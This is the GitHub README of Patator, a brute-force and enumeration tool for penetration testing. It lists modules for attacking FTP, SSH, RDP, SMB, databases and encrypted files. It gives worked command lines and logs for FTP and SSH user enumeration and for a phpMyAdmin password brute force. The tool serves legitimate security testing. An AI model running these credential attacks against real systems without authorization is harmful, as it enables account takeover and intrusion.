lanjelot/patator

GitHub: lanjelot/patator

A modular, multi-protocol brute-force and enumeration tool that covers password brute-forcing, user enumeration, DNS enumeration, cracking of encrypted files and other security-testing scenarios.

Stars: 3858 | Forks: 828

# Patator

Patator was written out of frustration with using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password-guessing attacks. I opted for a different approach in order to avoid creating yet another brute-forcing tool and repeating the same shortcomings. Patator is a multi-threaded tool written in Python that strives to be more reliable and flexible than its predecessors.

Currently it supports the following modules:

```
* ftp_login      : Brute-force FTP
* ssh_login      : Brute-force SSH
* telnet_login   : Brute-force Telnet
* smtp_login     : Brute-force SMTP
* smtp_vrfy      : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt      : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup  : Enumerate valid users using Finger
* http_fuzz      : Brute-force HTTP/HTTPS
* rdp_gateway    : Brute-force RDP Gateway
* ajp_fuzz       : Brute-force AJP
* pop_login      : Brute-force POP
* pop_passd      : Brute-force poppassd (not POP3)
* imap_login     : Brute-force IMAP
* ldap_login     : Brute-force LDAP
* dcom_login     : Brute-force DCOM
* smb_login      : Brute-force SMB
* smb_lookupsid  : Brute-force SMB SID-lookup
* rlogin_login   : Brute-force rlogin
* vmauthd_login  : Brute-force VMware Authentication Daemon
* mssql_login    : Brute-force MSSQL
* oracle_login   : Brute-force Oracle
* mysql_login    : Brute-force MySQL
* mysql_query    : Brute-force MySQL queries
* rdp_login      : Brute-force RDP (NLA)
* pgsql_login    : Brute-force PostgreSQL
* vnc_login      : Brute-force VNC
* dns_forward    : Brute-force DNS
* dns_reverse    : Brute-force DNS (reverse lookup subnets)
* ike_enum       : Enumerate IKE transforms
* snmp_login     : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass     : Brute-force the password of encrypted ZIP files
* keystore_pass  : Brute-force the password of Java keystore files
* sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
* umbraco_crack  : Crack Umbraco HMAC-SHA1 password hashes
```

The name "Patator" comes from [here](https://www.youtube.com/watch?v=9sF9fTALhVA).

Patator is not script-kiddie friendly; please read the text below, the [DeepWiki](https://deepwiki.com/lanjelot/patator) and the [wiki](https://github.com/lanjelot/patator/wiki) before reporting an issue.

## Installation

```
git clone https://github.com/lanjelot/patator.git
git clone https://github.com/danielmiessler/SecLists.git
docker build -t patator patator/
docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt
```

## Usage Examples

* FTP : Enumerating users denied login in `vsftpd/userlist`

```
$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT
19:36:06 patator INFO -
19:36:06 patator INFO - code size time | candidate | num | mesg
19:36:06 patator INFO - -----------------------------------------------------------------------------
19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful.
19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful.
19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied.
19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied.
19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied.
...
```

Tested on `vsftpd-3.0.2-9` on `CentOS 7.0-1406`.

* SSH : Time-based user enumeration

```
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
17:45:20 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT
17:45:20 patator INFO -
17:45:20 patator INFO - code size time | candidate | num | mesg
17:45:20 patator INFO - -----------------------------------------------------------------------------
17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | timed out
17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | timed out
17:45:37 patator FAIL - xxx 41 10.000 | joe | 40 | timed out
...
```

Tested on `openssh-server 1:6.0p1-4+deb7u2` on `Debian 7.8`.

* HTTP : Brute-force phpMyAdmin login

```
$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
11:53:47 patator INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST
11:53:47 patator INFO -
11:53:47 patator INFO - code size:clen time | candidate | num | mesg
11:53:47 patator INFO - -----------------------------------------------------------------------------
11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK
11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK
^C
11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s
11:53:54 patator INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40
```

Payload #72 is a false positive caused by an unexpected error message:

```
$ grep AllowNoPassword /tmp/qsdf/72_200\:13215\:0\:0.351.txt
...
class="icon ic_s_error" /> Login without a password is forbidden by configuration (see AllowNoPassword)
```